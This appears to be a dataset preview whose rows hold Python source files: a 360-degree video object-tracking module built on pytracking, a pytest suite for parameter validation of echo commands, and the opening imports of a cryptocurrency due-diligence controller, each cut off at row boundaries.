input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
#################################################################################################
# Visual object tracking in panoramic video
# Master thesis at Brno University of Technology - Faculty of Information Technology
# Author: <NAME> (<EMAIL>)
# Supervisor: Doc. Ing. <NAME>, Ph.D.
# Module: tracker_360_default.py
# Description: Default tracking using ECO, ATOM, DiMP or KYS tracker
#################################################################################################
# --------------------------------------------------------
# pytracking (https://github.com/visionml/pytracking)
# Licensed under GPL-3.0 License
# Copyright <NAME>, <NAME>
# --------------------------------------------------------
import importlib
import os
import sys
import numpy as np
from collections import OrderedDict
from pytracking.evaluation.environment import env_settings
import time
import cv2 as cv
from pytracking.utils.visdom import Visdom
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from pytracking.utils.plotting import draw_figure, overlay_mask
from pytracking.utils.convert_vot_anno_to_rect import convert_vot_anno_to_rect
from ltr.data.bounding_box_utils import masks_to_bboxes
from pytracking.evaluation.multi_object_wrapper import MultiObjectWrapper
from pathlib import Path
import torch
# custom modules to improve equirectangular tracking
from pytracking.evaluation.boundingbox import BoundingBox
from pytracking.evaluation.parser import Parser
class Tracker360Default:
"""Default tracking using ECO, ATOM, DiMP or KYS tracker"""
def __init__(self, name: str, parameter_name: str, video_path: str, groundtruth_path: str = None, save_result_path: str = None, run_id = None):
assert run_id is None or isinstance(run_id, int)
self.name = name
self.parameter_name = parameter_name
self.video_path = video_path
self.groundtruth_path = groundtruth_path
if save_result_path:
self.save_result_path = save_result_path
else:
self.save_result_path = "tmp-result-" + self.name.upper() + ".txt"
self.run_id = None
self.video = None
self.video_width = None
self.video_height = None
self.frame = None
self.tracker = None
self.bbox = None
self.gt_bounding_boxes = []
self.result_bounding_boxes = []
# enable parsing/creating methods
self.parser = Parser()
# constants for sizes and positions of opencv circles, rectangles and texts
self.RECTANGLE_BORDER_PX = 3
self.FONT_SCALE = 0.75
self.FONT_WEIGHT = 1
self.TEXT_ROW1_POS = (30,30)
self.TEXT_ROW2_POS = (30,60)
self.TEXT_ROW3_POS = (30,90)
self.TEXT_ROW4_POS = (30,120)
self.WINDOW_NAME = "Tracker-" + self.name.upper()
env = env_settings()
if self.run_id is None:
self.results_dir = '{}/{}/{}'.format(env.results_path, self.name, self.parameter_name)
else:
self.results_dir = '{}/{}/{}_{:03d}'.format(env.results_path, self.name, self.parameter_name, self.run_id)
tracker_module_abspath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'tracker', self.name))
if os.path.isdir(tracker_module_abspath):
tracker_module = importlib.import_module('pytracking.tracker.{}'.format(self.name))
self.tracker_class = tracker_module.get_tracker_class()
else:
self.tracker_class = None
self.visdom = None
def create_tracker(self, params):
tracker = self.tracker_class(params)
tracker.visdom = self.visdom
return tracker
def _init_visdom(self, visdom_info, debug):
visdom_info = {} if visdom_info is None else visdom_info
self.pause_mode = False
self.step = False
if debug > 0 and visdom_info.get('use_visdom', True):
try:
self.visdom = Visdom(debug, {'handler': self._visdom_ui_handler, 'win_id': 'Tracking'},
visdom_info=visdom_info)
# Show help
help_text = 'You can pause/unpause the tracker by pressing ''space'' with the ''Tracking'' window ' \
'selected. During paused mode, you can track for one frame by pressing the right arrow key.' \
'To enable/disable plotting of a data block, tick/untick the corresponding entry in ' \
'block list.'
self.visdom.register(help_text, 'text', 1, 'Help')
except:
time.sleep(0.5)
print('!!! WARNING: Visdom could not start, so using matplotlib visualization instead !!!\n'
'!!! Start Visdom in a separate terminal window by typing \'visdom\' !!!')
def _visdom_ui_handler(self, data):
if data['event_type'] == 'KeyPress':
if data['key'] == ' ':
self.pause_mode = not self.pause_mode
elif data['key'] == 'ArrowRight' and self.pause_mode:
self.step = True
def get_parameters(self):
"""Get parameters."""
param_module = importlib.import_module('pytracking.parameter.{}.{}'.format(self.name, self.parameter_name))
params = param_module.parameters()
return params
def _drawBoundingBox(self, videoWidth, point1, point2, boundingBox, color, thickness):
"""Method for drawing rectangle according to points"""
if (boundingBox.is_on_border()):
# draw two rectangles around the region of interest
rightBorderPoint = (videoWidth - 1, point2[1])
cv.rectangle(self.frame, point1, rightBorderPoint, color, thickness)
leftBorderPoint = (0, point1[1])
cv.rectangle(self.frame, leftBorderPoint, point2, color, thickness)
else:
# draw a rectangle around the region of interest
cv.rectangle(self.frame, point1, point2, color, thickness)
def _checkBoundsOfPoint(self, point):
"""Checks if given point is in interval [0,self.width] and [0,self.height] with x overflow"""
# horizontal could overflow in equirectangular
x = point[0]
y = point[1]
if x < 0:
x = self.video_width + x - 1
elif x > self.video_width - 1:
x = x - self.video_width - 1
# vertical
if y < 0:
y = 0
elif y > self.video_height - 1:
y = self.video_height - 1
point = (x,y)
return point
def _saveResults(self):
"""Method for saving result bounding boxes to .txt file"""
# creating string result data
resultData = self.parser.createAnnotations(self.result_bounding_boxes)
# saving file on drive
self.parser.saveDataToFile(self.save_result_path, resultData)
print("File '" + self.save_result_path + "' has been successfully created with total " + str(len(self.result_bounding_boxes)) + " computed frames.")
def run_video_default(self, optional_box=None, debug=None, visdom_info=None):
"""Method for start selected tracker without any modifications"""
params = self.get_parameters()
debug_ = debug
if debug is None:
debug_ = getattr(params, 'debug', 0)
params.debug = debug_
params.tracker_name = self.name
params.param_name = self.parameter_name
self._init_visdom(visdom_info, debug_)
multiobj_mode = getattr(params, 'multiobj_mode', getattr(self.tracker_class, 'multiobj_mode', 'default'))
if multiobj_mode == 'default':
self.tracker = self.create_tracker(params)
if hasattr(self.tracker, 'initialize_features'):
self.tracker.initialize_features()
elif multiobj_mode == 'parallel':
self.tracker = MultiObjectWrapper(self.tracker_class, params, self.visdom, fast_load=True)
else:
raise ValueError('Unknown multi object mode {}'.format(multiobj_mode))
###########################################################################
############# Part of custom modifications #############
###########################################################################
########## 1) Video Checking ##########
# Read video
self.video = cv.VideoCapture(self.video_path)
# Exit if video not opened.
if not self.video.isOpened():
print("Could not open video")
print(help)
sys.exit(-1)
# Read first frame.
ok, self.frame = self.video.read()
if not ok:
print("Error - Could not read a video file")
sys.exit(-1)
# save video width/height to global variables
self.video_width = int(self.video.get(cv.CAP_PROP_FRAME_WIDTH))
self.video_height = int(self.video.get(cv.CAP_PROP_FRAME_HEIGHT))
# correct format of initialization bbox
def _build_init_info(box):
return {'init_bbox': OrderedDict({1: box}), 'init_object_ids': [1, ], 'object_ids': [1, ], 'sequence_object_ids': [1, ]}
########## 2) Setup opencv window ##########
# resize window (lets define max width is 1600px)
if self.video_width < 1600:
cv.namedWindow(self.WINDOW_NAME)
else:
cv.namedWindow(self.WINDOW_NAME, cv.WINDOW_NORMAL | cv.WINDOW_KEEPRATIO)
whRatio = self.video_width / self.video_height
if whRatio == 2:
# pure equirectangular 2:1
cv.resizeWindow(self.WINDOW_NAME, 1600, 800)
else:
# default 16:9
cv.resizeWindow(self.WINDOW_NAME, 1600, 900)
scaleFactor = self.video_width / 1600
self.RECTANGLE_BORDER_PX = int(self.RECTANGLE_BORDER_PX * scaleFactor)
self.FONT_SCALE = self.FONT_SCALE * scaleFactor
self.FONT_WEIGHT = int(self.FONT_WEIGHT * scaleFactor) + 1
self.TEXT_ROW1_POS = (int(self.TEXT_ROW1_POS[0] * scaleFactor), int(self.TEXT_ROW1_POS[1] * scaleFactor))
self.TEXT_ROW2_POS = (int(self.TEXT_ROW2_POS[0] * scaleFactor), int(self.TEXT_ROW2_POS[1] * scaleFactor))
self.TEXT_ROW3_POS = (int(self.TEXT_ROW3_POS[0] * scaleFactor), int(self.TEXT_ROW3_POS[1] * scaleFactor))
self.TEXT_ROW4_POS = (int(self.TEXT_ROW4_POS[0] * scaleFactor), int(self.TEXT_ROW4_POS[1] * scaleFactor))
# use copy of frame to be shown in window
frame_disp = self.frame.copy()
########## 3) Initialation of bounding box ##########
# Set up initial bounding box
self.bbox = None
self.result_bounding_boxes = []
self.gt_bounding_boxes = []
if self.groundtruth_path:
# use first bounding box from given groundtruth
self.gt_bounding_boxes = self.parser.parseGivenDataFile(self.groundtruth_path, self.video_width)
if len(self.gt_bounding_boxes) > 0:
bb1 = self.gt_bounding_boxes[0]
if bb1.is_annotated:
self.bbox = (bb1.get_point1_x(), bb1.get_point1_y(), bb1.get_width(), bb1.get_height())
self.result_bounding_boxes.append(bb1)
else:
print("Error - Invalid first frame annotation from file: '" + self.groundtruth_path + "'")
sys.exit(-1)
else:
# using opencv select ROI
cv.putText(frame_disp, 'Select target ROI and press ENTER', self.TEXT_ROW1_POS, cv.FONT_HERSHEY_SIMPLEX, self.FONT_SCALE, (0, 200, 250), self.FONT_WEIGHT)
x, y, w, h = cv.selectROI(self.WINDOW_NAME, frame_disp, False)
self.bbox = [x, y, w, h]
# save it to result list
p1 = (int(self.bbox[0]), int(self.bbox[1]))
p2 = (int(self.bbox[0] + self.bbox[2]), int(self.bbox[1] + self.bbox[3]))
# new instance of bounding box
bb1 = BoundingBox(p1, p2, self.video_width)
bb1.is_annotated = True
self.result_bounding_boxes.append(bb1)
if not(self.bbox) or self.bbox == (0,0,0,0):
print("Error - Invalid first frame annotation")
sys.exit(-1)
########## 4) Tracking process ##########
# prints just basic guide and info
print("--------------------------------------------------------------------")
print("pytracking default tracking process has started...")
print("Tracker : " + self.name.upper())
print("Frame #1 : " + str(self.bbox))
print("Press 'Esc' or 'Q' key to exit")
print("--------------------------------------------------------------------")
# display first frame
cv.imshow(self.WINDOW_NAME, frame_disp)
# initialize tracker with first frame and bounding box
self.tracker.initialize(self.frame, _build_init_info(self.bbox))
# if you want to have the FPS according to the video then uncomment this code
# fps = cap.get(cv.CAP_PROP_FPS)
videoFPS = 30
# calculate the interval between frame
interval = int(1000/videoFPS)
while True:
# Read a new frame
ok, self.frame = self.video.read()
if not ok:
break
# Start timer
timer = cv.getTickCount()
# Get tracked bbox
out = self.tracker.track(self.frame)
state = [int(s) for s in out['target_bbox'][1]]
# Calculate Frames per second (FPS)
fps = cv.getTickFrequency() / (cv.getTickCount() - timer)
# draw bounding box
if state[0] and state[1] and state[2] and state[3]:
# Tracking success
p1 = (state[0], state[1])
p2 = (state[0] + state[2], state[1] + state[3])
p1 = self._checkBoundsOfPoint(p1)
p2 = self._checkBoundsOfPoint(p2)
# new instance of bounding box
bb = BoundingBox(p1, p2, self.video_width)
bb.is_annotated = True
self.result_bounding_boxes.append(bb)
# draw bounding box to original frame
self._drawBoundingBox(self.video_width, p1, p2, bb, (0, 255, 0), self.RECTANGLE_BORDER_PX)
else:
# tracking failure
cv.putText(self.frame, "Tracking failure detected", self.TEXT_ROW4_POS, cv.FONT_HERSHEY_SIMPLEX, self.FONT_SCALE, (0, 0, 255), self.FONT_WEIGHT)
# new instance of bounding box
bb | |
import json
import pytest
from helper import wait_for_response
from helper.assertion import assert_successful_request, assert_validation_error
@pytest.fixture(scope="class")
def system_spec():
return {'system': 'complex', 'system_version': '1.0.0.dev0', 'instance_name': 'c1'}
@pytest.mark.usefixtures('easy_client', 'request_generator')
class TestComplex(object):
def test_invalid_instance_name(self):
request = self.request_generator.generate_request(instance_name="INVALID_NAME", command="ping")
assert_validation_error(self, self.easy_client, request)
def test_invalid_system_name(self):
request = self.request_generator.generate_request(system="BAD_SYSTEM_NAME", command="ping")
assert_validation_error(self, self.easy_client, request)
def test_invalid_system_version(self):
request = self.request_generator.generate_request(system_version="INVALID_VERSION", command="ping")
assert_validation_error(self, self.easy_client, request)
def test_invalid_command(self):
request = self.request_generator.generate_request(command="INVALID_COMMAND")
assert_validation_error(self, self.easy_client, request)
def test_good_ping(self):
request = self.request_generator.generate_request(command="ping")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
def test_ping_with_invalid_parameters(self):
request = self.request_generator.generate_request(command="ping", parameters={"foo": "bar"})
assert_validation_error(self, self.easy_client, request)
def test_ping_with_comment(self):
request = self.request_generator.generate_request(command="ping", comment="comment_text")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, comment="comment_text")
def test_boolean_good(self):
request = self.request_generator.generate_request(command="echo_bool",
parameters={"b": True})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="true")
def test_boolean_bad_type(self):
request = self.request_generator.generate_request(command="echo_bool",
parameters={"b": "NOT_A_BOOL"})
assert_validation_error(self, self.easy_client, request)
def test_nullable_boolean_as_null(self):
request = self.request_generator.generate_request(command="echo_boolean_nullable",
parameters={"b": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_nullable_boolean_with_true_default_as_null(self):
request = self.request_generator.generate_request(command="echo_boolean_nullable_with_true_default",
parameters={"b": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_nullable_boolean_with_true_not_in_param(self):
request = self.request_generator.generate_request(command="echo_boolean_nullable_with_true_default",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="true")
def test_optional_boolean_with_false_default(self):
request = self.request_generator.generate_request(command="echo_boolean_optional_with_false_default")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="false")
def test_echo_float_valid(self):
request = self.request_generator.generate_request(command="echo_float",
parameters={"f": 1.2})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="1.2")
def test_echo_float_invalid_type(self):
request = self.request_generator.generate_request(command="echo_float",
parameters={"f": "INVALID_TYPE"})
assert_validation_error(self, self.easy_client, request)
def test_echo_integer_valid(self):
request = self.request_generator.generate_request(command="echo_integer",
parameters={"i": 1})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="1")
def test_echo_integer_invalid_type(self):
request = self.request_generator.generate_request(command="echo_integer",
parameters={"i": 1.2})
assert_validation_error(self, self.easy_client, request)
def test_echo_integer_in_choice(self):
request = self.request_generator.generate_request(command="echo_integer_with_lots_of_choices",
parameters={"i": 15})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="15")
def test_echo_integer_invalid_choice(self):
request = self.request_generator.generate_request(command="echo_integer_with_lots_of_choices",
parameters={"i": 1.5})
assert_validation_error(self, self.easy_client, request)
def test_echo_integer_choice_out_of_range(self):
request = self.request_generator.generate_request(command="echo_integer_with_lots_of_choices",
parameters={"i": -10})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_model(self):
parameters = {"model": {"my_list_of_strings": ["a", "b", "c"], "my_choices_string": "a"}}
request = self.request_generator.generate_request(command="echo_list_model",
parameters=parameters)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert parameters['model'] == json.loads(response.output)
def test_echo_list_model_invalid_model_type(self):
request = self.request_generator.generate_request(command="echo_list_model",
parameters={"model": ["SHOULD_BE_DICT"]})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_model_invalid_type_inside_list(self):
request = self.request_generator.generate_request(command="echo_list_model",
parameters={"model": ["good", {"bad": "time"}]})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_model_null_inside_list_not_allowed(self):
request = self.request_generator.generate_request(command="echo_list_model",
parameters={"model": ["good", None]})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_of_booleans(self):
request = self.request_generator.generate_request(command="echo_list_of_booleans",
parameters={"list_of_b": [True, False]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps([True, False]))
def test_echo_list_of_booleans_with_maximum_good(self):
request = self.request_generator.generate_request(command="echo_list_of_booleans_with_maximum",
parameters={"list_of_b": [True, False]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps([True, False]))
def test_echo_list_of_booleans_with_maximum_too_many(self):
request = self.request_generator.generate_request(command="echo_list_of_booleans_with_maximum",
parameters={"list_of_b": [True, False, True]})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_of_booleans_with_minimum_good(self):
request = self.request_generator.generate_request(command="echo_list_of_booleans_with_minimum",
parameters={"list_of_b": [True, False]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps([True, False]))
def test_echo_list_of_booleans_with_minimum_too_few(self):
request = self.request_generator.generate_request(command="echo_list_of_booleans_with_minimum",
parameters={"list_of_b": [True]})
assert_validation_error(self, self.easy_client, request)
def test_echo_list_of_integers(self):
request = self.request_generator.generate_request(command="echo_list_of_integers",
parameters={"list_of_i": [1, 2]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps([1, 2]))
def test_echo_list_of_strings(self):
request = self.request_generator.generate_request(command="echo_list_of_strings",
parameters={"list_of_s": ["1", "2"]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(["1", "2"]))
def test_echo_list_of_strings_with_choices(self):
request = self.request_generator.generate_request(command="echo_list_of_strings_with_choices",
parameters={"list_of_s": ["a", "b"]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(["a", "b"]))
def test_echo_list_of_strings_with_choices_repeat_values(self):
request = self.request_generator.generate_request(command="echo_list_of_strings_with_choices",
parameters={"list_of_s": ["a", "a"]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(["a", "a"]))
def test_echo_list_of_strings_with_default(self):
request = self.request_generator.generate_request(command="echo_list_of_strings_with_default",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(["a", "b", "c"]))
def test_echo_list_of_strings_with_default_required_no_list_provided(self):
request = self.request_generator.generate_request(command="echo_list_of_strings_with_default_required",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(['a', 'b', 'c']))
def test_echo_list_of_strings_with_default_required_none_entry_provided(self):
request = self.request_generator.generate_request(command="echo_list_of_strings_with_default_required",
parameters={"list_of_s": None})
assert_validation_error(self, self.easy_client, request)
def test_echo_message_huge_json(self):
request = self.request_generator.generate_request(command='echo_message_huge_json')
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
def test_echo_model(self):
parameters = {
'model': {
'my_string': 'my_string',
'my_string_with_choices': 'A',
'my_int': 1,
'my_float': 1.2,
'my_bool': True,
'my_any': ["this", "is", "an", "any"],
'my_raw_dict': {"foo": "bar", "baz": [1, 2, 3], "null_thing": None, "dict": {"another": "dict"},
"ball": 1, "float": 1.2, "bool": False},
'my_nested_model': {
'my_nested_string': "my_nested_string",
'my_nested_int': 2
},
'my_list_of_strings': ['a', 'b', 'c'],
'my_optional_string': 'provided_anyway',
'my_nullable_string': None,
'my_list_of_models': [
{'my_list_of_strings': ['more', 'list', 'of', 'strings'], "my_choices_string": "a"},
{'my_list_of_strings': ['more', 'list', 'of', 'strings2'], "my_choices_string": "b"},
]
}
}
request = self.request_generator.generate_request(command="echo_model",
parameters=parameters)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert parameters['model'] == json.loads(response.output)
def test_echo_model_optional_not_provided(self):
request = self.request_generator.generate_request(command="echo_model_optional")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_model_simple_list(self):
parameters = {
'models': [
{'my_nested_string': "foo", "my_nested_int": 1},
{'my_nested_string': "bar", "my_nested_int": 2},
{'my_nested_string': "baz", "my_nested_int": 3}
]
}
request = self.request_generator.generate_request(command="echo_model_simple_list",
parameters=parameters)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert parameters['models'] == json.loads(response.output)
def test_echo_model_simple_list_with_default(self):
request = self.request_generator.generate_request(command="echo_model_simple_list_with_default")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert json.loads(response.output) == [
{"my_nested_string": "str1", "my_nested_int": 1},
{"my_nested_string": "str2", "my_nested_int": 2}
]
def test_echo_model_with_nested_defaults_override(self):
model = {"my_foo": "foo", "my_bar": "bar"}
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults",
parameters={"model": model})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(model))
def test_echo_model_with_nested_defaults_partial_fallback_to_model(self):
model = {"my_foo": "foo"}
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults",
parameters={"model": model})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "foo", "my_bar": "defaultBarFromModel"}))
def test_echo_model_with_nested_defaults_fallback_to_model_defaults(self):
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults",
parameters={"model": {}})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "defaultFooFromModel",
"my_bar": "defaultBarFromModel"}))
def test_echo_model_with_nested_defaults_nothing_provided(self):
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "clientFooValue", "my_bar": "clientBarValue"}))
def test_echo_model_with_nested_defaults_invalid_key_provided(self):
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults",
parameters={"model": {"BAD_KEY": "abc"}})
assert_validation_error(self, self.easy_client, request)
def test_echo_model_with_nested_defaults_no_main_nothing_provided(self):
request = self.request_generator.generate_request(command="echo_model_with_nested_defaults_no_main")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "defaultFooFromModel",
"my_bar": "defaultBarFromModel"}))
def test_echo_optional_any_multi_message_with_default(self):
parameters = {"messages": [
"foo",
None,
{"foo": "bar"},
1,
1.2,
["a", "b", "c"],
True
]}
request = self.request_generator.generate_request(command="echo_optional_any_multi_message_with_default",
parameters=parameters)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert json.loads(response.output) == parameters['messages']
def test_echo_optional_message_nullable_false_null_provided(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_false",
parameters={"message": None})
assert_validation_error(self, self.easy_client, request)
def test_echo_optional_message_nullable_false_no_key_provided(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_false",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
def test_echo_optional_message_nullable_true_no_default_no_key(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_true_no_default",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_message_nullable_true_no_default_null(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_true_no_default",
parameters={"message": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_message_nullable_true_non_null_default_no_key(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_true_non_default")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="can be null")
def test_echo_optional_message_nullable_true_non_null_default_none(self):
request = self.request_generator.generate_request(command="echo_optional_message_nullable_true_non_default",
parameters={"message": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_model_with_defaults_no_key(self):
request = self.request_generator.generate_request(command="echo_optional_model_with_defaults")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_model_with_defaults_key_none(self):
request = self.request_generator.generate_request(command="echo_optional_model_with_defaults",
parameters={"model": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_model_with_defaults_empty_model(self):
request = self.request_generator.generate_request(command="echo_optional_model_with_defaults",
parameters={"model": {}})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "defaultFooFromModel",
"my_bar": "defaultBarFromModel"}))
def test_echo_optional_model_with_defaults_partial_model(self):
request = self.request_generator.generate_request(command="echo_optional_model_with_defaults",
parameters={"model": {"my_foo": "provided"}})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"my_foo": "provided",
"my_bar": "defaultBarFromModel"}))
def test_echo_optional_multi_nullable_model_empty_list_provided(self):
request = self.request_generator.generate_request(command="echo_optional_multi_nullable_model",
parameters={"param": []})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="[]")
def test_echo_optional_multi_nullable_model_none_provided(self):
request = self.request_generator.generate_request(command="echo_optional_multi_nullable_model",
parameters={"param": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_multi_nullable_model_no_key(self):
request = self.request_generator.generate_request(command="echo_optional_multi_nullable_model",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_optional_multi_nullable_model_list_provided(self):
parameters = {'param': [
{"my_nested_string": "str1", "my_nested_int": 1}
]}
request = self.request_generator.generate_request(command="echo_optional_multi_nullable_model",
parameters=parameters)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert parameters['param'] == json.loads(response.output)
def test_echo_optional_multi_nullable_model_with_both_defaults(self):
request = self.request_generator.generate_request(
command="echo_optional_multi_nullable_model_with_both_defaults")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert [{'my_foo': 'foo', 'my_bar': 'bar'}] == json.loads(response.output)
def test_echo_optional_multi_nullable_model_with_partial_default_provided(self):
parameters = {
'param': [
{"my_foo": "foo_from_client"}
]
}
request = self.request_generator.generate_request(
command="echo_optional_multi_nullable_model_with_both_defaults",
parameters=parameters
)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert [{'my_foo': 'foo_from_client', 'my_bar': 'defaultBarFromModel'}] == json.loads(response.output)
def test_echo_optional_multi_nullable_model_with_model_defaults(self):
request = self.request_generator.generate_request(
command="echo_optional_multi_nullable_model_with_model_defaults",
parameters={"param": [{}]}
)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert [{'my_foo': 'defaultFooFromModel', 'my_bar': 'defaultBarFromModel'}] == json.loads(response.output)
def test_echo_optional_multi_nullable_model_with_multi_defaults(self):
request = self.request_generator.generate_request(
command="echo_optional_multi_nullable_model_with_multi_defaults"
)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert [{'my_nested_string': 'hi', 'my_nested_int': 2}] == json.loads(response.output)
def test_echo_optional_multi_nullable_model_with_multi_defaults_partial(self):
request = self.request_generator.generate_request(
command="echo_optional_multi_nullable_model_with_multi_defaults",
parameters={"param": [{"my_nested_string": "hi"}]}
)
assert_validation_error(self, self.easy_client, request)
def test_echo_optional_multi_nullable_string(self):
request = self.request_generator.generate_request(command="echo_optional_multi_nullable_string")
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps(["hello", "there"]))
def test_echo_optional_multi_nullable_string_null_provided(self):
request = self.request_generator.generate_request(command="echo_optional_multi_nullable_string",
parameters={"param": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_dictionary_no_model_invalid_type(self):
request = self.request_generator.generate_request(command="echo_raw_dictionary",
parameters={"d": "THIS IS NOT A DICT"})
assert_validation_error(self, self.easy_client, request)
def test_dictionary_no_model_valid_type(self):
request = self.request_generator.generate_request(command="echo_raw_dictionary",
parameters={"d": {"foo": "bar"}})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"foo": "bar"}))
def test_echo_raw_dictionary_nullable(self):
request = self.request_generator.generate_request(command="echo_raw_dictionary_nullable",
parameters={"d": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_raw_dictionary_nullable_no_key(self):
request = self.request_generator.generate_request(command="echo_raw_dictionary_nullable",
parameters={})
assert_validation_error(self, self.easy_client, request)
def test_echo_raw_dictionary_nullable_optional(self):
request = self.request_generator.generate_request(command="echo_raw_dictionary_optional",
parameters={"d": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_raw_dictionary_nullable_optional_no_key(self):
request = self.request_generator.generate_request(command="echo_raw_dictionary_optional",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_raw_dictionary_optional_with_default(self):
request = self.request_generator.generate_request(command="echo_raw_dictionary_optional_with_default",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"foo": "bar"}))
def test_echo_raw_dictionary_optional_with_maximum_too_many(self):
request = self.request_generator.generate_request(command="echo_raw_dictionary_optional_with_maximum",
parameters={"1": "foo", "2": "foo", "3": "foo"})
assert_validation_error(self, self.easy_client, request)
def test_echo_required_any_message(self):
request = self.request_generator.generate_request(command="echo_required_any_message",
parameters={"message": {"foo": "bar"}})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output=json.dumps({"foo": "bar"}))
def test_echo_required_any_multi_message(self):
request = self.request_generator.generate_request(command="echo_required_any_multi_message",
parameters={"messages": [{'foo': 'bar'}]})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response)
assert [{'foo': 'bar'}] == json.loads(response.output)
def test_echo_required_message(self):
request = self.request_generator.generate_request(command="echo_required_message")
assert_validation_error(self, self.easy_client, request)
def test_echo_required_message_nullable_false_no_default(self):
request = self.request_generator.generate_request(command="echo_required_message_nullable_false_no_default")
assert_validation_error(self, self.easy_client, request)
def test_echo_required_message_nullable_false_with_default(self):
request = self.request_generator.generate_request(command="echo_required_message_nullable_false_with_default",
parameters={"message": None})
assert_validation_error(self, self.easy_client, request)
def test_echo_required_message_nullable_false_with_default_no_key(self):
request = self.request_generator.generate_request(command="echo_required_message_nullable_false_with_default",
parameters={})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="cannot be null")
def test_echo_required_message_nullable_true(self):
request = self.request_generator.generate_request(command="echo_required_message_nullable_true",
parameters={"message": None})
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_required_message_nullable_true_with_default(self):
request = self.request_generator.generate_request(
command="echo_required_message_nullable_true_with_non_null_default",
parameters={"message": None}
)
response = wait_for_response(self.easy_client, request)
assert_successful_request(response, output="null")
def test_echo_required_message_nullable_true_with_default_no_key(self):
request = self.request_generator.generate_request(
command="echo_required_message_nullable_true_with_non_null_default",
parameters={}
)
response = wait_for_response(self.easy_client, | |
<gh_stars>1-10
"""Cryptocurrency Due diligence Controller"""
__docformat__ = "numpy"
# pylint: disable=R0904, C0302, W0622
import argparse
import os
import pandas as pd
